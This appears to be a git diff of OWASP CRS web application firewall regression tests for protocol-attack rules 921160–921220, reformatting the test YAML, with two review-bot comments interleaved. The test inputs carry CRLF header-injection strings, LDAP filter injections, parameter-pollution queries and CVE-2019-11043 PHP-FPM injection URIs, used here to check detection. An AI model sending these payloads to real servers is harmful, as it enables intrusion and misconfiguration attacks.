@@ -1,103 +1,96 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921160.yaml" description: "Tests for protocol based attacks" +rule_id: 921160 tests: - - test_title: 921160-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: 
"/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - 
test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=%0d%0arefresh:%20www.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=%0d%0arefresh:%20www.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index a4c10816b..6af9701df 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml 
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml 
@@ -1,103 +1,96 @@ --- meta: author: "jptosso, azurit" - enabled: true - name: "921180.yaml" description: "Tests to trigger, or not trigger 921170 and 921180" +rule_id: 921180 tests: - # Standard GET request - test_title: 921180-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # Standard GET request - test_title: 921180-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pizza=pineapple" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pizza=pineapple" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # Standard GET request (Negative, no args) - test_title: 921180-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # HPP payload - test_title: 921180-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza" + version: "HTTP/1.1" + output: + log_contains: "id \"921180\"" - # Similar arg names - test_title: 921180-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple2=aint-pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple2=aint-pizza" + 
version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # HPP payload with multiple iterations - test_title: 921180-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" + version: "HTTP/1.1" + output: + log_contains: "id \"921180\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index b92fc6b0a..3176f6c5c 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml 
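Review bot: The file now carries `rule_id: 921180` in meta, but the untouched `description: "Tests to trigger, or not trigger 921170 and 921180"` still names 921170, and none of the six tests asserts on that id. Either narrow it to `description: "Tests to trigger, or not trigger 921180"`, or, if 921170 coverage is intended here, add a matching `log_contains`/`no_log_contains` for it. The per-test `# Standard GET request` / `# HPP payload` comments survive the conversion, which helps; the other files in this series carry the same intent in a `desc:` field, which the runner can also report.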
@@ -2,66 +2,61 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: "HTTP Splitting" - enabled: true - name: 921190.yaml +rule_id: 921190 tests: - - test_title: 921190-1 + - test_id: 1 desc: "New line char in request filename (1)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0Abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0Abar" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 2 desc: "New line char in request filename (2)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0abar" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP%0Ainfo.php?QQQ" - version: "HTTP/1.1" - 
output: - log_contains: id "921190" - - test_title: 921190-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP%0Ainfo.php?QQQ" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" + version: "HTTP/1.1" + output: + log_contains: id "921190" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 13b3dc180..70e89f148 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml 
@@ -2,176 +2,165 @@ meta: author: "Christian Folini, azurit" description: "LDAP injection" - enabled: true - name: 921200.yaml +rule_id: 921200 tests: - - test_title: 921200-1 + - test_id: 1 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 2 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 3 desc: "Testing 
for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 4 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=bar)(%26)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-5 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=bar)(%26)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 5 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=printer)(uid=*)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-6 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=printer)(uid=*)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 6 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=void)(objectClass=users))(%26(objectClass=void)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-7 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=void)(objectClass=users))(%26(objectClass=void)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 7 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=eb9adbd87d)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-8 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=eb9adbd87d)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 8 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-9 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 9 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)(uid=*))(|(uid=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-10 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)(uid=*))(|(uid=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 10 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=aaa*aaa)(cn>=bob)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=aaa*aaa)(cn>=bob)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml index 78b250c06..44347f128 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml 
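Review bot: Tests 4 through 10 all carry the identical `desc: "Testing for rule, this should trigger"`, so a failing test id says nothing about which LDAP filter shape (`)(%26)`, `)(uid=*)`, `)!(sn=*`, `(cn>=bob)`, and so on) stopped matching. A one-line per-test description, for example `desc: "Closing paren followed by injected AND filter"` for test 4, would make triage faster. The three FP tests 1 to 3 POST a body without a `Content-Type` header; whether that body is parsed into ARGS and actually exercises the rule depends on the runner's default, which is worth confirming or making explicit with `Content-Type: "application/x-www-form-urlencoded"`.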
@@ -2,51 +2,47 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921210.yaml +rule_id: 921210 tests: - - test_title: 921210-1 + - test_id: 1 desc: "HTTP Parameter Pollution via bogus chars after parameter array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a=bar&foo[1]b=" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a=bar&foo[1]b=" + version: "HTTP/1.1" + output: + log_contains: id "921210" + - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a[2]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a[2]=bar" + version: "HTTP/1.1" + output: + log_contains: id "921210" + - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1][2]=bar" - version: "HTTP/1.1" - output: - no_log_contains: id "921210" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1][2]=bar" + version: "HTTP/1.1" + output: + no_log_contains: id "921210" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml index 6f260a6b0..e5b4235e0 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml @@ -2,22 +2,20 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921220.yaml +rule_id: 921220 tests: - - test_title: 921220-1 + - test_id: 1 desc: "Potential HTTP Parameter Pollution via parameter array" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get?foo[1]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921220" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get?foo[1]=bar" + version: "HTTP/1.1" + output: + log_contains: id "921220" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml index dbe32ad8b..ad2d3659f 100644 
